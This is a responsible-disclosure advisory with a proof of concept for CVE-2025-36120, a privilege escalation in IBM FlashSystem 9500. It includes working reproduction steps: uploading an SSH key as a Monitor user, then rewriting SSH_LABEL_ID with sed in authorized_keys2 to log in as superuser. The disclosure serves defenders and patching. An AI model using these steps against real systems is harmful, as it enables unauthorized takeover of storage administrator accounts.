CVE-2025-36120
Improper authorization in the IBM FlashSystem leads to privilege escalation via SSH authorized keys
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
IBM FlashSystem 9500
v8.6.0.3
Jakub Sajniak and Patryk Rejchert
IBM FlashSystem allows a user to provide their SSH key, which is then written to the authorized_keys file. Using a set of limited commands in rbash, threat actor can perform a privilege escalation by overwriting the SSH_LABEL_ID within the authorized_keys file. This results in the account takeover of the superuser with just Monitor access privileges.
- Login as Monitor user
- Observe our user has 16 ID (lsuser command)
- Upload the SSH key (e.g. via GUI), use public key generated with:
ssh-keygen -t rsa
- Observe it has been saved in authorized_keys2:
IBM_FlashSystem:[REDACTED]:pentest1>more .ssh/authorized_keys2
environment="SSH_LABEL_ID=0",environment="SSH_EPOCH=1" ssh-rsa [REDACTED]
[...]
environment="SSH_LABEL_ID=16",environment="SSH_EPOCH=1" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCsGlWK1j1gRCJdYtvI+YWioIsAmc1p7Qj6vug5bAtBG14mQol+X5sPXRr1y3cqMwFNEn8tPQgGrER8za4ec6A3o5slM2ZcBrUAIQQf1iU7AtpKstsm0E5gliFrRx6XbWRWyZKmSclpFsm2kL0uxVZTuqcWOB7uN4pPQ8Ozlv0
bt1CyU5oL+w2jEc4C+MVYy8Fmp3CVEAhTrzw//7FJRCAsc1MpBZnJZvjtdtw0DfPo8GhdiQkpCjQgsd9AUkFcDqIlOjELVW0VXqWHnRKzMlwaEnc3TWu/9wIXhA509C5b6i44pvSA0cBwvbDSZooACc/SH9RgDrYd0v5C4JpKXciVRGvlbTHXRQDwEuq9nIcAQMlePtFT7w9W2PRUuK+Y8cK0r0sZ4CcOZiLkpN+VyCUY4uc98EnFyr7opAxYRV0b73Pn5K
GcrqNc30Y89+IVg2qdLJblpRrAdlWMdB6cuSALblrHXyfR2D5grbkXu/iOIF0ExNLPk8v/eRZhrOBi1UZAZlG1MK/wg8h+UgACSwjN7a6Wo8R7VX/Bwmimd6xcxsziBwPbULJMvTYKlfzbNhYFK4qSq4y6n6OeUpxcggPqvMTsbXuI1/n/q5jxYflyff7ZdbXPVG+IKaNOElU8mQjxVts5Ryn8D/dM/Jtik4eF3O6Q7Vr4g8E3QYoMG+7UyQ==
- Change the SSH_LABEL_ID to 0 so it will point to superuser - it is required to change SSH_EPOCH to same as user to be hijacked:
sed -ie 's/environment="SSH_LABEL_ID=0"/environment="SSH_LABEL_ID=30"/g' .ssh/authorized_keys2 # this changes the superuser so it is not duplicated
sed -ie 's/environment="SSH_LABEL_ID=16"/environment="SSH_LABEL_ID=0"/g' .ssh/authorized_keys2 # this changes our user key to superuser - Use the private key generated before to login as superuser:
ssh -i key superuser@[REDACTED]
IBM_FlashSystem:[REDACTED]:superuser>
- 11-07-2025 - Vulnerability reported to vendor
- 27-08-2025 - Security advisory is published by the vendor
- 19-12-2025 - PoC published
https://www.ibm.com/support/pages/node/7240796
https://www.cve.org/CVERecord?id=CVE-2025-36120
